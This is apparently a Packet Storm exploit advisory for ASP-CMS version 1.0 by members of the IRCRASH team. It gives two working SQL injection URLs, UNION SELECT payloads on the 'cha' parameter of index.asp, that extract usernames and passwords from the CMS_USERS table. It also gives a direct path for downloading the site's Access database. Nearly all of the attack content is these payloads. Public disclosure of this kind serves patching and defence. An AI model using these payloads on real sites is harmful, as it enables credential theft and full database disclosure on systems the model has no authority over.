ASP-CMS version 1.0 suffers from remote SQL injection and database disclosure vulnerabilities.
b3d667514b265b894bae15f62ac9f709896d0de55104ab981e546b3d0eac0849#####################################################################################
#### ASP-CMS v.1.0 Sql Injection/Database Disclosure ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
#####################################################################################
# #
#Download : http://puzzle.dl.sourceforge.net/sourceforge/asp-cms/asp-cms.18-12-04.zip
# #
#DORK : :( #
# #
#####################################################################################
# [Sql Injection] #
# #
#Username : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS
# #
#Password : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS
# #
#####################################################################################
# [Database Disclosure] #
# #
#http://Site/[path]/mdb-database/ASP-CMS_v100.mdb #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed